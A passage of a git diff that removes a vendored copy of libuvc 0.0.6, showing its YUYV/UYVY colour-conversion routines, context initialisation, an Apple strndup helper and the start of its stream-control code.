-#define IYUYV2RGB_16(pyuv, prgb) IYUYV2RGB_8(pyuv, prgb); IYUYV2RGB_8(pyuv + 16, prgb + 24);
-#define IYUYV2RGB_8(pyuv, prgb) IYUYV2RGB_4(pyuv, prgb); IYUYV2RGB_4(pyuv + 8, prgb + 12);
-#define IYUYV2RGB_4(pyuv, prgb) IYUYV2RGB_2(pyuv, prgb); IYUYV2RGB_2(pyuv + 4, prgb + 6);
-
-/** @brief Convert a frame from YUYV to RGB
- * @ingroup frame
- *
- * @param in YUYV frame
- * @param out RGB frame
- */
-uvc_error_t uvc_yuyv2rgb(uvc_frame_t *in, uvc_frame_t *out) {
-  if (in->frame_format != UVC_FRAME_FORMAT_YUYV)
-    return UVC_ERROR_INVALID_PARAM;
-
-  if (uvc_ensure_frame_size(out, in->width * in->height * 3) < 0)
-    return UVC_ERROR_NO_MEM;
-
-  out->width = in->width;
-  out->height = in->height;
-  out->frame_format = UVC_FRAME_FORMAT_RGB;
-  out->step = in->width * 3;
-  out->sequence = in->sequence;
-  out->capture_time = in->capture_time;
-  out->source = in->source;
-
-  uint8_t *pyuv = in->data;
-  uint8_t *prgb = out->data;
-  uint8_t *prgb_end = prgb + out->data_bytes;
-
-  while (prgb < prgb_end) {
-    IYUYV2RGB_8(pyuv, prgb);
-
-    prgb += 3 * 8;
-    pyuv += 2 * 8;
-  }
-
-  return UVC_SUCCESS;
-}
-
-#define IYUYV2BGR_2(pyuv, pbgr) { \
-    int r = (22987 * ((pyuv)[3] - 128)) >> 14; \
-    int g = (-5636 * ((pyuv)[1] - 128) - 11698 * ((pyuv)[3] - 128)) >> 14; \
-    int b = (29049 * ((pyuv)[1] - 128)) >> 14; \
-    (pbgr)[0] = sat(*(pyuv) + b); \
-    (pbgr)[1] = sat(*(pyuv) + g); \
-    (pbgr)[2] = sat(*(pyuv) + r); \
-    (pbgr)[3] = sat((pyuv)[2] + b); \
-    (pbgr)[4] = sat((pyuv)[2] + g); \
-    (pbgr)[5] = sat((pyuv)[2] + r); \
-    }
-#define IYUYV2BGR_16(pyuv, pbgr) IYUYV2BGR_8(pyuv, pbgr); IYUYV2BGR_8(pyuv + 16, pbgr + 24);
-#define IYUYV2BGR_8(pyuv, pbgr) IYUYV2BGR_4(pyuv, pbgr); IYUYV2BGR_4(pyuv + 8, pbgr + 12);
-#define IYUYV2BGR_4(pyuv, pbgr) IYUYV2BGR_2(pyuv, pbgr); IYUYV2BGR_2(pyuv + 4, pbgr + 6);
-
-/** @brief Convert a frame from YUYV to BGR
- * @ingroup frame
- *
- * @param in YUYV frame
- * @param out BGR frame
- */
-uvc_error_t uvc_yuyv2bgr(uvc_frame_t *in, uvc_frame_t *out) {
-  if (in->frame_format != UVC_FRAME_FORMAT_YUYV)
-    return UVC_ERROR_INVALID_PARAM;
-
-  if (uvc_ensure_frame_size(out, in->width * in->height * 3) < 0)
-    return UVC_ERROR_NO_MEM;
-
-  out->width = in->width;
-  out->height = in->height;
-  out->frame_format = UVC_FRAME_FORMAT_BGR;
-  out->step = in->width * 3;
-  out->sequence = in->sequence;
-  out->capture_time = in->capture_time;
-  out->source = in->source;
-
-  uint8_t *pyuv = in->data;
-  uint8_t *pbgr = out->data;
-  uint8_t *pbgr_end = pbgr + out->data_bytes;
-
-  while (pbgr < pbgr_end) {
-    IYUYV2BGR_8(pyuv, pbgr);
-
-    pbgr += 3 * 8;
-    pyuv += 2 * 8;
-  }
-
-  return UVC_SUCCESS;
-}
-
-#define IYUYV2Y(pyuv, py) { \
-    (py)[0] = (pyuv[0]); \
-    }
-
-/** @brief Convert a frame from YUYV to Y (GRAY8)
- * @ingroup frame
- *
- * @param in YUYV frame
- * @param out GRAY8 frame
- */
-uvc_error_t uvc_yuyv2y(uvc_frame_t *in, uvc_frame_t *out) {
-  if (in->frame_format != UVC_FRAME_FORMAT_YUYV)
-    return UVC_ERROR_INVALID_PARAM;
-
-  if (uvc_ensure_frame_size(out, in->width * in->height) < 0)
-    return UVC_ERROR_NO_MEM;
-
-  out->width = in->width;
-  out->height = in->height;
-  out->frame_format = UVC_FRAME_FORMAT_GRAY8;
-  out->step = in->width;
-  out->sequence = in->sequence;
-  out->capture_time = in->capture_time;
-  out->source = in->source;
-
-  uint8_t *pyuv = in->data;
-  uint8_t *py = out->data;
-  uint8_t *py_end = py + out->data_bytes;
-
-  while (py < py_end) {
-    IYUYV2Y(pyuv, py);
-
-    py += 1;
-    pyuv += 2;
-  }
-
-  return UVC_SUCCESS;
-}
-
-#define IYUYV2UV(pyuv, puv) { \
-    (puv)[0] = (pyuv[1]); \
-    }
-
-/** @brief Convert a frame from YUYV to UV (GRAY8)
- * @ingroup frame
- *
- * @param in YUYV frame
- * @param out GRAY8 frame
- */
-uvc_error_t uvc_yuyv2uv(uvc_frame_t *in, uvc_frame_t *out) {
-  if (in->frame_format != UVC_FRAME_FORMAT_YUYV)
-    return UVC_ERROR_INVALID_PARAM;
-
-  if (uvc_ensure_frame_size(out, in->width * in->height) < 0)
-    return UVC_ERROR_NO_MEM;
-
-  out->width = in->width;
-  out->height = in->height;
-  out->frame_format = UVC_FRAME_FORMAT_GRAY8;
-  out->step = in->width;
-  out->sequence = in->sequence;
-  out->capture_time = in->capture_time;
-  out->source = in->source;
-
-  uint8_t *pyuv = in->data;
-  uint8_t *puv = out->data;
-  uint8_t *puv_end = puv + out->data_bytes;
-
-  while (puv < puv_end) {
-    IYUYV2UV(pyuv, puv);
-
-    puv += 1;
-    pyuv += 2;
-  }
-
-  return UVC_SUCCESS;
-}
-
-#define IUYVY2RGB_2(pyuv, prgb) { \
-    int r = (22987 * ((pyuv)[2] - 128)) >> 14; \
-    int g = (-5636 * ((pyuv)[0] - 128) - 11698 * ((pyuv)[2] - 128)) >> 14; \
-    int b = (29049 * ((pyuv)[0] - 128)) >> 14; \
-    (prgb)[0] = sat((pyuv)[1] + r); \
-    (prgb)[1] = sat((pyuv)[1] + g); \
-    (prgb)[2] = sat((pyuv)[1] + b); \
-    (prgb)[3] = sat((pyuv)[3] + r); \
-    (prgb)[4] = sat((pyuv)[3] + g); \
-    (prgb)[5] = sat((pyuv)[3] + b); \
-    }
-#define IUYVY2RGB_16(pyuv, prgb) IUYVY2RGB_8(pyuv, prgb); IUYVY2RGB_8(pyuv + 16, prgb + 24);
-#define IUYVY2RGB_8(pyuv, prgb) IUYVY2RGB_4(pyuv, prgb); IUYVY2RGB_4(pyuv + 8, prgb + 12);
-#define IUYVY2RGB_4(pyuv, prgb) IUYVY2RGB_2(pyuv, prgb); IUYVY2RGB_2(pyuv + 4, prgb + 6);
-
-/** @brief Convert a frame from UYVY to RGB
- * @ingroup frame
- * @param ini UYVY frame
- * @param out RGB frame
- */
-uvc_error_t uvc_uyvy2rgb(uvc_frame_t *in, uvc_frame_t *out) {
-  if (in->frame_format != UVC_FRAME_FORMAT_UYVY)
-    return UVC_ERROR_INVALID_PARAM;
-
-  if (uvc_ensure_frame_size(out, in->width * in->height * 3) < 0)
-    return UVC_ERROR_NO_MEM;
-
-  out->width = in->width;
-  out->height = in->height;
-  out->frame_format = UVC_FRAME_FORMAT_RGB;
-  out->step = in->width *3;
-  out->sequence = in->sequence;
-  out->capture_time = in->capture_time;
-  out->source = in->source;
-
-  uint8_t *pyuv = in->data;
-  uint8_t *prgb = out->data;
-  uint8_t *prgb_end = prgb + out->data_bytes;
-
-  while (prgb < prgb_end) {
-    IUYVY2RGB_8(pyuv, prgb);
-
-    prgb += 3 * 8;
-    pyuv += 2 * 8;
-  }
-
-  return UVC_SUCCESS;
-}
-
-#define IUYVY2BGR_2(pyuv, pbgr) { \
-    int r = (22987 * ((pyuv)[2] - 128)) >> 14; \
-    int g = (-5636 * ((pyuv)[0] - 128) - 11698 * ((pyuv)[2] - 128)) >> 14; \
-    int b = (29049 * ((pyuv)[0] - 128)) >> 14; \
-    (pbgr)[0] = sat((pyuv)[1] + b); \
-    (pbgr)[1] = sat((pyuv)[1] + g); \
-    (pbgr)[2] = sat((pyuv)[1] + r); \
-    (pbgr)[3] = sat((pyuv)[3] + b); \
-    (pbgr)[4] = sat((pyuv)[3] + g); \
-    (pbgr)[5] = sat((pyuv)[3] + r); \
-    }
-#define IUYVY2BGR_16(pyuv, pbgr) IUYVY2BGR_8(pyuv, pbgr); IUYVY2BGR_8(pyuv + 16, pbgr + 24);
-#define IUYVY2BGR_8(pyuv, pbgr) IUYVY2BGR_4(pyuv, pbgr); IUYVY2BGR_4(pyuv + 8, pbgr + 12);
-#define IUYVY2BGR_4(pyuv, pbgr) IUYVY2BGR_2(pyuv, pbgr); IUYVY2BGR_2(pyuv + 4, pbgr + 6);
-
-/** @brief Convert a frame from UYVY to BGR
- * @ingroup frame
- * @param ini UYVY frame
- * @param out BGR frame
- */
-uvc_error_t uvc_uyvy2bgr(uvc_frame_t *in, uvc_frame_t *out) {
-  if (in->frame_format != UVC_FRAME_FORMAT_UYVY)
-    return UVC_ERROR_INVALID_PARAM;
-
-  if (uvc_ensure_frame_size(out, in->width * in->height * 3) < 0)
-    return UVC_ERROR_NO_MEM;
-
-  out->width = in->width;
-  out->height = in->height;
-  out->frame_format = UVC_FRAME_FORMAT_BGR;
-  out->step = in->width *3;
-  out->sequence = in->sequence;
-  out->capture_time = in->capture_time;
-  out->source = in->source;
-
-  uint8_t *pyuv = in->data;
-  uint8_t *pbgr = out->data;
-  uint8_t *pbgr_end = pbgr + out->data_bytes;
-
-  while (pbgr < pbgr_end) {
-    IUYVY2BGR_8(pyuv, pbgr);
-
-    pbgr += 3 * 8;
-    pyuv += 2 * 8;
-  }
-
-  return UVC_SUCCESS;
-}
-
-/** @brief Convert a frame to RGB
- * @ingroup frame
- *
- * @param in non-RGB frame
- * @param out RGB frame
- */
-uvc_error_t uvc_any2rgb(uvc_frame_t *in, uvc_frame_t *out) {
-  switch (in->frame_format) {
-    case UVC_FRAME_FORMAT_YUYV:
-      return uvc_yuyv2rgb(in, out);
-    case UVC_FRAME_FORMAT_UYVY:
-      return uvc_uyvy2rgb(in, out);
-    case UVC_FRAME_FORMAT_RGB:
-      return uvc_duplicate_frame(in, out);
-    default:
-      return UVC_ERROR_NOT_SUPPORTED;
-  }
-}
-
-/** @brief Convert a frame to BGR
- * @ingroup frame
- *
- * @param in non-BGR frame
- * @param out BGR frame
- */
-uvc_error_t uvc_any2bgr(uvc_frame_t *in, uvc_frame_t *out) {
-  switch (in->frame_format) {
-    case UVC_FRAME_FORMAT_YUYV:
-      return uvc_yuyv2bgr(in, out);
-    case UVC_FRAME_FORMAT_UYVY:
-      return uvc_uyvy2bgr(in, out);
-    case UVC_FRAME_FORMAT_BGR:
-      return uvc_duplicate_frame(in, out);
-    default:
-      return UVC_ERROR_NOT_SUPPORTED;
-  }
-}
diff --git a/thirdparty/libuvc-0.0.6/src/init.c b/thirdparty/libuvc-0.0.6/src/init.c
deleted file mode 100644
index 041fe58..0000000
--- a/thirdparty/libuvc-0.0.6/src/init.c
+++ /dev/null
@@ -1,163 +0,0 @@
-/*********************************************************************
-* Software License Agreement (BSD License)
-*
-*  Copyright (C) 2010-2012 Ken Tossell
-*  All rights reserved.
-*
-*  Redistribution and use in source and binary forms, with or without
-*  modification, are permitted provided that the following conditions
-*  are met:
-*
-*   * Redistributions of source code must retain the above copyright
-*     notice, this list of conditions and the following disclaimer.
-*   * Redistributions in binary form must reproduce the above
-*     copyright notice, this list of conditions and the following
-*     disclaimer in the documentation and/or other materials provided
-*     with the distribution.
-*   * Neither the name of the author nor other contributors may be
-*     used to endorse or promote products derived from this software
-*     without specific prior written permission.
-*
-*  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-*  "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-*  LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
-*  FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
-*  COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
-*  INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
-*  BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-*  LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-*  CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
-*  LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
-*  ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-*  POSSIBILITY OF SUCH DAMAGE.
-*********************************************************************/
-/**
-\mainpage libuvc: a cross-platform library for USB video devices
-
-\b libuvc is a library that supports enumeration, control and streaming
-for USB Video Class (UVC) devices, such as consumer webcams.
-
-\section features Features
-\li UVC device \ref device "discovery and management" API
-\li \ref streaming "Video streaming" (device to host) with asynchronous/callback and synchronous/polling modes
-\li Read/write access to standard \ref ctrl "device settings"
-\li \ref frame "Conversion" between various formats: RGB, YUV, JPEG, etc.
-\li Tested on Mac and Linux, portable to Windows and some BSDs
-
-\section roadmap Roadmap
-\li Bulk-mode image capture
-\li One-shot image capture
-\li Improved support for standard settings
-\li Support for "extended" (vendor-defined) settings
-
-\section misc Misc.
-\p The source code can be found at https://github.com/ktossell/libuvc. To build
-the library, install <a href="http://libusb.org/">libusb</a> 1.0+ and run:
-
-\code
-$ git clone https://github.com/ktossell/libuvc.git
-$ cd libuvc
-$ mkdir build
-$ cd build
-$ cmake -DCMAKE_BUILD_TYPE=Release ..
-$ make && make install
-\endcode
-
-\section Example
-In this example, libuvc is used to acquire images in a 30 fps, 640x480
-YUV stream from a UVC device such as a standard webcam.
-
-\include example.c
-
-*/
-
-/**
- * @defgroup init Library initialization/deinitialization
- * @brief Setup routines used to construct UVC access contexts
- */
-#include "libuvc/libuvc.h"
-#include "libuvc/libuvc_internal.h"
-
-/** @internal
- * @brief Event handler thread
- * There's one of these per UVC context.
- * @todo We shouldn't run this if we don't own the USB context
- */
-void *_uvc_handle_events(void *arg) {
-  uvc_context_t *ctx = (uvc_context_t *) arg;
-
-  while (!ctx->kill_handler_thread)
-    libusb_handle_events_completed(ctx->usb_ctx, &ctx->kill_handler_thread);
-  return NULL;
-}
-
-/** @brief Initializes the UVC context
- * @ingroup init
- *
- * @note If you provide your own USB context, you must handle
- * libusb event processing using a function such as libusb_handle_events.
- *
- * @param[out] pctx The location where the context reference should be stored.
- * @param[in]  usb_ctx Optional USB context to use
- * @return Error opening context or UVC_SUCCESS
- */
-uvc_error_t uvc_init(uvc_context_t **pctx, struct libusb_context *usb_ctx) {
-  uvc_error_t ret = UVC_SUCCESS;
-  uvc_context_t *ctx = calloc(1, sizeof(*ctx));
-
-  if (usb_ctx == NULL) {
-    ret = libusb_init(&ctx->usb_ctx);
-    ctx->own_usb_ctx = 1;
-    if (ret != UVC_SUCCESS) {
-      free(ctx);
-      ctx = NULL;
-    }
-  } else {
-    ctx->own_usb_ctx = 0;
-    ctx->usb_ctx = usb_ctx;
-  }
-
-  if (ctx != NULL)
-    *pctx = ctx;
-
-  return ret;
-}
-
-/**
- * @brief Closes the UVC context, shutting down any active cameras.
- * @ingroup init
- *
- * @note This function invalides any existing references to the context's
- * cameras.
- *
- * If no USB context was provided to #uvc_init, the UVC-specific USB
- * context will be destroyed.
- *
- * @param ctx UVC context to shut down
- */
-void uvc_exit(uvc_context_t *ctx) {
-  uvc_device_handle_t *devh;
-
-  DL_FOREACH(ctx->open_devices, devh) {
-    uvc_close(devh);
-  }
-
-  if (ctx->own_usb_ctx)
-    libusb_exit(ctx->usb_ctx);
-
-  free(ctx);
-}
-
-/**
- * @internal
- * @brief Spawns a handler thread for the context
- * @ingroup init
- *
- * This should be called at the end of a successful uvc_open if no devices
- * are already open (and being handled).
- */
-void uvc_start_handler_thread(uvc_context_t *ctx) {
-  if (ctx->own_usb_ctx)
-    pthread_create(&ctx->handler_thread, NULL, _uvc_handle_events, (void*) ctx);
-}
-
diff --git a/thirdparty/libuvc-0.0.6/src/misc.c b/thirdparty/libuvc-0.0.6/src/misc.c
deleted file mode 100644
index 8ce850f..0000000
--- a/thirdparty/libuvc-0.0.6/src/misc.c
+++ /dev/null
@@ -1,58 +0,0 @@
-/*********************************************************************
-* Software License Agreement (BSD License)
-*
-*  Copyright (C) 2010-2012 Ken Tossell
-*  All rights reserved.
-*
-*  Redistribution and use in source and binary forms, with or without
-*  modification, are permitted provided that the following conditions
-*  are met:
-*
-*   * Redistributions of source code must retain the above copyright
-*     notice, this list of conditions and the following disclaimer.
-*   * Redistributions in binary form must reproduce the above
-*     copyright notice, this list of conditions and the following
-*     disclaimer in the documentation and/or other materials provided
-*     with the distribution.
-*   * Neither the name of the author nor other contributors may be
-*     used to endorse or promote products derived from this software
-*     without specific prior written permission.
-*
-*  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-*  "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-*  LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
-*  FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
-*  COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
-*  INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
-*  BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-*  LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-*  CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
-*  LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
-*  ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-*  POSSIBILITY OF SUCH DAMAGE.
-*********************************************************************/
-#include <string.h>
-#include <stdlib.h>
-
-#if __APPLE__
-char *strndup(const char *s, size_t n) {
-  size_t src_n = 0;
-  const char *sp = s;
-  char *d;
-
-  while (*sp++)
-    src_n++;
-
-  if (src_n < n)
-    n = src_n;
-
-  d = malloc(n + 1);
-
-  memcpy(d, s, n);
-  
-  d[n] = '\0';
-
-  return d;
-}
-#endif
-
diff --git a/thirdparty/libuvc-0.0.6/src/stream.c b/thirdparty/libuvc-0.0.6/src/stream.c
deleted file mode 100644
index d309628..0000000
--- a/thirdparty/libuvc-0.0.6/src/stream.c
+++ /dev/null
@@ -1,1288 +0,0 @@
-/*********************************************************************
-* Software License Agreement (BSD License)
-*
-*  Copyright (C) 2010-2012 Ken Tossell
-*  All rights reserved.
-*
-*  Redistribution and use in source and binary forms, with or without
-*  modification, are permitted provided that the following conditions
-*  are met:
-*
-*   * Redistributions of source code must retain the above copyright
-*     notice, this list of conditions and the following disclaimer.
-*   * Redistributions in binary form must reproduce the above
-*     copyright notice, this list of conditions and the following
-*     disclaimer in the documentation and/or other materials provided
-*     with the distribution.
-*   * Neither the name of the author nor other contributors may be
-*     used to endorse or promote products derived from this software
-*     without specific prior written permission.
-*
-*  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-*  "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-*  LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
-*  FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
-*  COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
-*  INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
-*  BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-*  LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-*  CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
-*  LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
-*  ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-*  POSSIBILITY OF SUCH DAMAGE.
-*********************************************************************/
-/**
- * @defgroup streaming Streaming control functions
- * @brief Tools for creating, managing and consuming video streams
- */
-
-#include "libuvc/libuvc.h"
-#include "libuvc/libuvc_internal.h"
-#include "errno.h"
-
-#ifdef _MSC_VER
-
-#define DELTA_EPOCH_IN_MICROSECS  116444736000000000Ui64
-
-// gettimeofday - get time of day for Windows;
-// A gettimeofday implementation for Microsoft Windows;
-// Public domain code, author "ponnada";
-int gettimeofday(struct timeval *tv, struct timezone *tz)
-{
-    FILETIME ft;
-    unsigned __int64 tmpres = 0;
-    static int tzflag = 0;
-    if (NULL != tv)
-    {
-        GetSystemTimeAsFileTime(&ft);
-        tmpres |= ft.dwHighDateTime;
-        tmpres <<= 32;
-        tmpres |= ft.dwLowDateTime;
-        tmpres /= 10;
-        tmpres -= DELTA_EPOCH_IN_MICROSECS;
-        tv->tv_sec = (long)(tmpres / 1000000UL);
-        tv->tv_usec = (long)(tmpres % 1000000UL);
-    }
-    return 0;
-}
-#endif // _MSC_VER
-uvc_frame_desc_t *uvc_find_frame_desc_stream(uvc_stream_handle_t *strmh,
-    uint16_t format_id, uint16_t frame_id);
-uvc_frame_desc_t *uvc_find_frame_desc(uvc_device_handle_t *devh,
-    uint16_t format_id, uint16_t frame_id);
-void *_uvc_user_caller(void *arg);
-void _uvc_populate_frame(uvc_stream_handle_t *strmh);
-
-struct format_table_entry {
-  enum uvc_frame_format format;
-  uint8_t abstract_fmt;
-  uint8_t guid[16];
-  int children_count;
-  enum uvc_frame_format *children;
-};
-
-struct format_table_entry *_get_format_entry(enum uvc_frame_format format) {
-  #define ABS_FMT(_fmt, _num, ...) \
-    case _fmt: { \
-    static enum uvc_frame_format _fmt##_children[] = __VA_ARGS__; \
-    static struct format_table_entry _fmt##_entry = { \
-      _fmt, 0, {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0}, _num, _fmt##_children }; \
-    return &_fmt##_entry; }
-
-  #define FMT(_fmt, ...) \
-    case _fmt: { \
-    static struct format_table_entry _fmt##_entry = { \
-      _fmt, 0, __VA_ARGS__, 0, NULL }; \
-    return &_fmt##_entry; }
-
-  switch(format) {
-    /* Define new formats here */
-    ABS_FMT(UVC_FRAME_FORMAT_ANY, 2,
-      {UVC_FRAME_FORMAT_UNCOMPRESSED, UVC_FRAME_FORMAT_COMPRESSED})
-
-    ABS_FMT(UVC_FRAME_FORMAT_UNCOMPRESSED, 4,
-      {UVC_FRAME_FORMAT_YUYV, UVC_FRAME_FORMAT_UYVY, UVC_FRAME_FORMAT_GRAY8,
-      UVC_FRAME_FORMAT_GRAY16})
-    FMT(UVC_FRAME_FORMAT_YUYV,
-      {'Y',  'U',  'Y',  '2', 0x00, 0x00, 0x10, 0x00, 0x80, 0x00, 0x00, 0xaa, 0x00, 0x38, 0x9b, 0x71})
-    FMT(UVC_FRAME_FORMAT_UYVY,
-      {'U',  'Y',  'V',  'Y', 0x00, 0x00, 0x10, 0x00, 0x80, 0x00, 0x00, 0xaa, 0x00, 0x38, 0x9b, 0x71})
-    FMT(UVC_FRAME_FORMAT_GRAY8,
-      {'Y',  '8',  '0',  '0', 0x00, 0x00, 0x10, 0x00, 0x80, 0x00, 0x00, 0xaa, 0x00, 0x38, 0x9b, 0x71})
-    FMT(UVC_FRAME_FORMAT_GRAY16,
-      {'Y',  '1',  '6',  ' ', 0x00, 0x00, 0x10, 0x00, 0x80, 0x00, 0x00, 0xaa, 0x00, 0x38, 0x9b, 0x71})
-    FMT(UVC_FRAME_FORMAT_BY8,
-      {'B',  'Y',  '8',  ' ', 0x00, 0x00, 0x10, 0x00, 0x80, 0x00, 0x00, 0xaa, 0x00, 0x38, 0x9b, 0x71})
-    FMT(UVC_FRAME_FORMAT_BA81,
-      {'B',  'A',  '8',  '1', 0x00, 0x00, 0x10, 0x00, 0x80, 0x00, 0x00, 0xaa, 0x00, 0x38, 0x9b, 0x71})
-    FMT(UVC_FRAME_FORMAT_SGRBG8,
-      {'G',  'R',  'B',  'G', 0x00, 0x00, 0x10, 0x00, 0x80, 0x00, 0x00, 0xaa, 0x00, 0x38, 0x9b, 0x71})
-    FMT(UVC_FRAME_FORMAT_SGBRG8,
-      {'G',  'B',  'R',  'G', 0x00, 0x00, 0x10, 0x00, 0x80, 0x00, 0x00, 0xaa, 0x00, 0x38, 0x9b, 0x71})
-    FMT(UVC_FRAME_FORMAT_SRGGB8,
-      {'R',  'G',  'G',  'B', 0x00, 0x00, 0x10, 0x00, 0x80, 0x00, 0x00, 0xaa, 0x00, 0x38, 0x9b, 0x71})
-    FMT(UVC_FRAME_FORMAT_SBGGR8,
-      {'B',  'G',  'G',  'R', 0x00, 0x00, 0x10, 0x00, 0x80, 0x00, 0x00, 0xaa, 0x00, 0x38, 0x9b, 0x71})
-    ABS_FMT(UVC_FRAME_FORMAT_COMPRESSED, 1,
-      {UVC_FRAME_FORMAT_MJPEG})
-    FMT(UVC_FRAME_FORMAT_MJPEG,
-      {'M',  'J',  'P',  'G'})
-
-    default:
-      return NULL;
-  }
-
-  #undef ABS_FMT
-  #undef FMT
-}
-
-static uint8_t _uvc_frame_format_matches_guid(enum uvc_frame_format fmt, uint8_t guid[16]) {
-  struct format_table_entry *format;
-  int child_idx;
-
-  format = _get_format_entry(fmt);
-  if (!format)
-    return 0;
-
-  if (!format->abstract_fmt && !memcmp(guid, format->guid, 16))
-    return 1;
-
-  for (child_idx = 0; child_idx < format->children_count; child_idx++) {
-    if (_uvc_frame_format_matches_guid(format->children[child_idx], guid))
-      return 1;
-  }
-
-  return 0;
-}
-
-static enum uvc_frame_format uvc_frame_format_for_guid(uint8_t guid[16]) {
-  struct format_table_entry *format;
-  enum uvc_frame_format fmt;
-
-  for (fmt = 0; fmt < UVC_FRAME_FORMAT_COUNT; ++fmt) {
-    format = _get_format_entry(fmt);
-    if (!format || format->abstract_fmt)
-      continue;
-    if (!memcmp(format->guid, guid, 16))
-      return format->format;
-  }
-
-  return UVC_FRAME_FORMAT_UNKNOWN;
-}
-
-/** @internal
- * Run a streaming control query
- * @param[in] devh UVC device
- * @param[in,out] ctrl Control block
- * @param[in] probe Whether this is a probe query or a commit query
- * @param[in] req Query type
- */
-uvc_error_t uvc_query_stream_ctrl(
-    uvc_device_handle_t *devh,
-    uvc_stream_ctrl_t *ctrl,
-    uint8_t probe,
-    enum uvc_req_code req) {
-  uint8_t buf[34];
-  size_t len;
-  uvc_error_t err;
-
-  memset(buf, 0, sizeof(buf));
-
-  if (devh->info->ctrl_if.bcdUVC >= 0x0110)
-    len = 34;
-  else
-    len = 26;
-
-  /* prepare for a SET transfer */
-  if (req == UVC_SET_CUR) {
-    SHORT_TO_SW(ctrl->bmHint, buf);
-    buf[2] = ctrl->bFormatIndex;
-    buf[3] = ctrl->bFrameIndex;
-    INT_TO_DW(ctrl->dwFrameInterval, buf + 4);
-    SHORT_TO_SW(ctrl->wKeyFrameRate, buf + 8);
-    SHORT_TO_SW(ctrl->wPFrameRate, buf + 10);
-    SHORT_TO_SW(ctrl->wCompQuality, buf + 12);
-    SHORT_TO_SW(ctrl->wCompWindowSize, buf + 14);
-    SHORT_TO_SW(ctrl->wDelay, buf + 16);
-    INT_TO_DW(ctrl->dwMaxVideoFrameSize, buf + 18);
-    INT_TO_DW(ctrl->dwMaxPayloadTransferSize, buf + 22);
-
-    if (len == 34) {
-      INT_TO_DW ( ctrl->dwClockFrequency, buf + 26 );
-      buf[30] = ctrl->bmFramingInfo;
-      buf[31] = ctrl->bPreferredVersion;
-      buf[32] = ctrl->bMinVersion;
-      buf[33] = ctrl->bMaxVersion;
-      /** @todo support UVC 1.1 */
-    }
-  }
-
-  /* do the transfer */
-  err = libusb_control_transfer(
-      devh->usb_devh,
-      req == UVC_SET_CUR ? 0x21 : 0xA1,
-      req,
-      probe ? (UVC_VS_PROBE_CONTROL << 8) : (UVC_VS_COMMIT_CONTROL << 8),
-      ctrl->bInterfaceNumber,
-      buf, len, 0
-  );
-
-  if (err <= 0) {
-    return err;
-  }
-
-  /* now decode following a GET transfer */
-  if (req != UVC_SET_CUR) {
-    ctrl->bmHint = SW_TO_SHORT(buf);
-    ctrl->bFormatIndex = buf[2];
-    ctrl->bFrameIndex = buf[3];
-    ctrl->dwFrameInterval = DW_TO_INT(buf + 4);
-    ctrl->wKeyFrameRate = SW_TO_SHORT(buf + 8);
-    ctrl->wPFrameRate = SW_TO_SHORT(buf + 10);
-    ctrl->wCompQuality = SW_TO_SHORT(buf + 12);
-    ctrl->wCompWindowSize = SW_TO_SHORT(buf + 14);
-    ctrl->wDelay = SW_TO_SHORT(buf + 16);
-    ctrl->dwMaxVideoFrameSize = DW_TO_INT(buf + 18);
-    ctrl->dwMaxPayloadTransferSize = DW_TO_INT(buf + 22);
-
-    if (len == 34) {
-      ctrl->dwClockFrequency = DW_TO_INT ( buf + 26 );
-      ctrl->bmFramingInfo = buf[30];
-      ctrl->bPreferredVersion = buf[31];
-      ctrl->bMinVersion = buf[32];
-      ctrl->bMaxVersion = buf[33];
-      /** @todo support UVC 1.1 */
-    }
-    else
-      ctrl->dwClockFrequency = devh->info->ctrl_if.dwClockFrequency;
-
-    /* fix up block for cameras that fail to set dwMax* */
-    if (ctrl->dwMaxVideoFrameSize == 0) {
